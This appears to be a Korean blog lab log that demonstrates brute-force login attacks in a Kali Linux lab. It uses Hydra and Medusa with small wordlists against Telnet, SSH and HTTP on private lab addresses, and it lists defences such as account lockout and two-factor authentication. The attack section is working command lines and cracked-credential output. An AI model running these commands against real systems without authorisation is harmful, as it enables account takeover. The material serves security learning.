🌐 무차별 대입 공격이란?
무차별 대입 공격(Brute Force Attack)은 가능한 모든 조합을 시도하여 계정 인증을 우회하려는 공격 기법입니다.
보안 테스트 및 취약점 점검 시 주로 사용되며, 실제 환경에서 사용할 때는 법적 문제를 유의해야 합니다.
🛠️ 실습 환경
- OS: Kali Linux
- 도구: Hydra, Medusa
- 대상: Telnet, SSH, HTTP
- 파일: usernames.txt, passwords.txt
💻 Hydra를 이용한 무차별 대입 공격
1. 사용자와 비밀번호 파일 생성
사용자 목록
bash
복사편집
echo "ccna" > usernames.txt echo "ccnp" >> usernames.txt echo "ccie" >> usernames.txt
비밀번호 목록
bash
복사편집
echo "cisco" > passwords.txt echo "cisco1" >> passwords.txt echo "cisco2" >> passwords.txt
💡 TIP:
- >: 파일을 새로 생성하여 내용 입력
- >>: 파일에 내용을 추가
2. 파일 내용 확인
사용자 파일 조회
bash
복사편집
cat usernames.txt
출력:
nginx
복사편집
ccna ccnp ccie
비밀번호 파일 조회
bash
복사편집
cat passwords.txt
출력:
nginx
복사편집
cisco cisco1 cisco2
3. Hydra 설치 확인
bash
복사편집
hydra -h
💡 TIP: Hydra가 설치되어 있지 않다면 아래 명령어로 설치할 수 있습니다.
bash
복사편집
apt install hydra -y
4. Telnet 무차별 대입 공격
공격 명령어
bash
복사편집
hydra -l ccnp -P passwords.txt telnet://10.1.1.11
실행 결과
pgsql
복사편집
[DATA] max 3 tasks per 1 server, overall 3 tasks, 3 login tries [23][telnet] host: 10.1.1.11 login: ccnp password: cisco
💡 TIP:
- -l: 사용자 이름
- -P: 비밀번호 목록 파일
- telnet://: 공격 대상 프로토콜과 IP 주소 지정
- 성공: 비밀번호가 cisco로 확인됨
💻 Medusa를 이용한 무차별 대입 공격
1. Medusa 설치
bash
복사편집
apt install medusa -y
💡 TIP: Medusa는 다양한 프로토콜을 지원하며, Hydra와 유사한 기능을 수행합니다.
2. 사용자와 비밀번호 파일 생성 (Kali Linux)
bash
복사편집
nano usernames.txt nano passwords.txt
파일 내용 확인
bash
복사편집
cat usernames.txt ccna ccnp ccie cat passwords.txt cisco2 cisco1 cisco
3. Medusa 무차별 대입 공격
SSH 공격
bash
복사편집
medusa -h 10.1.1.11 -U usernames.txt -P passwords.txt -M ssh
Telnet 공격
bash
복사편집
medusa -h 10.1.1.11 -U usernames.txt -P passwords.txt -M telnet
HTTP 공격
bash
복사편집
medusa -h 10.1.1.21 -U usernames.txt -P passwords.txt -M http
💡 TIP:
- -h: 대상 IP 주소
- -U: 사용자 목록 파일
- -P: 비밀번호 목록 파일
- -M: 공격 대상 프로토콜
💡 무차별 대입 공격 방어 대책
- 복잡한 비밀번호 사용: 길고 복잡한 조합을 사용하여 추측이 어렵게 합니다.
- 계정 잠금 설정: 반복적인 로그인 실패 시 계정을 잠그는 정책을 적용합니다.
- 이중 인증 도입: 비밀번호 외에 추가 인증 수단을 통해 보안을 강화합니다.
- IP 차단: 특정 IP에서 반복적인 인증 시도가 감지되면 차단합니다.
✅ 실습 결과
- Hydra와 Medusa를 이용하여 무차별 대입 공격 수행
- Telnet, SSH, HTTP 대상 공격 성공
- ccnp 계정의 비밀번호로 cisco 확인
- 보안 대책 수립의 중요성 확인
📝 결론
무차별 대입 공격은 단순하지만 여전히 유효한 공격 기법입니다. 특히 Telnet과 같은 취약 프로토콜에서는 손쉽게 인증을 우회할 수 있어 보안 대책이 필수적입니다. Hydra와 Medusa를 활용한 실습을 통해 무차별 대입 공격의 원리를 이해하고, 이에 대한 방어 대책의 필요성을 확인했습니다.
💡 다음 목표:
- SSH와 같은 보안 프로토콜로 전환
- 계정 잠금 및 모니터링 설정 강화
- 이중 인증 도입으로 추가 보안 계층 마련
'02. 클라우드 보안 공부 > 실습로그' 카테고리의 다른 글
| ✅ [실습로그] Ansible로 서버 관리 자동화 - NGINX와 HTTPD 설치 및 관리 (0) | 2025.05.17 |
|---|---|
| ✅ [실습로그] Ansible로 SSH 키 기반 서버 관리 자동화 - HTTPD와 NGINX 배포 (0) | 2025.05.17 |
| ✅ [실습로그] Snort 기반 IDS/IPS 설정 - 침입 탐지와 방지 시스템 구축 (0) | 2025.05.15 |
| ✅ [실습로그] Ansible 설치와 설정 - 자동화 플랫폼 구축 (0) | 2025.05.15 |
| ✅ [실습로그] IDS/IPS와 Snort 설정 - 네트워크 보안 강화하기 (0) | 2025.05.13 |